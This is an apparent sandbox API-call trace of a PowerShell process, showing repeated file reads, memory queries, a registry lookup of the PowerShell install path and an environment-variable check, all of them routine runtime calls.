	[0422.854] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.854] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.854] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.855] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.855] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.855] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.856] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.856] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.856] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.856] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.857] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.858] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.858] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.858] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.859] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.859] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.859] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.859] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.860] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.860] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.860] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.860] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.861] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.861] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.861] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.861] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.862] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.864] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.864] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.864] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.864] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.865] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.865] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.865] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.865] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1000, lpOverlapped=0x0) returned 1
	[0422.866] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x1b4, lpOverlapped=0x0) returned 1
	[0422.866] ReadFile (in: hFile=0x1bc, lpBuffer=0x2d17550, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d708, lpOverlapped=0x0 | out: lpBuffer=0x2d17550*, lpNumberOfBytesRead=0x18d708*=0x0, lpOverlapped=0x0) returned 1
	[0422.866] CloseHandle (hObject=0x1bc) returned 1
	[0422.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0422.866] SetErrorMode (uMode=0x1) returned 0x1
	[0422.866] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d680 | out: lpFileInformation=0x18d680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0422.867] SetErrorMode (uMode=0x1) returned 0x1
	[0422.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0422.867] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d768 | out: phkResult=0x18d768*=0x1bc) returned 0x0
	[0422.867] RegQueryValueExW (in: hKey=0x1bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d6ec, lpData=0x0, lpcbData=0x18d6e8*=0x0 | out: lpType=0x18d6ec*=0x1, lpData=0x0, lpcbData=0x18d6e8*=0x56) returned 0x0
	[0422.867] CoTaskMemAlloc (cb=0x5a) returned 0x1b349870
	[0422.867] RegQueryValueExW (in: hKey=0x1bc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d6bc, lpData=0x1b349870, lpcbData=0x18d6b8*=0x56 | out: lpType=0x18d6bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d6b8*=0x56) returned 0x0
	[0422.867] CoTaskMemFree (pv=0x1b349870) 
	[0422.867] RegCloseKey (hKey=0x1bc) returned 0x0
	[0422.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0422.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x18d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0424.305] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.312] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.313] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.313] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.314] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.314] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.314] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.316] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.606] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.607] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.608] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.609] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.610] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.611] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.614] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.614] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.622] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.628] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.628] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.628] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.629] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.629] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.629] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.629] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.630] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.630] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.630] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.630] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.631] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.631] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.632] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.634] VirtualQuery (in: lpAddress=0x18c460, lpBuffer=0x18d320, dwLength=0x30 | out: lpBuffer=0x18d320*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.634] VirtualQuery (in: lpAddress=0x18c460, lpBuffer=0x18d320, dwLength=0x30 | out: lpBuffer=0x18d320*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0424.634] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.026] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.067] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.068] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.068] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.359] CoTaskMemAlloc (cb=0x104) returned 0x290840
	[0425.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x290840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0425.359] CoTaskMemFree (pv=0x290840) 
	[0425.363] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.371] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.372] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.373] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.374] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.375] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.375] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0425.376] VirtualQuery (in: lpAddress=0x18c450, lpBuffer=0x18d310, dwLength=0x30 | out: lpBuffer=0x18d310*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
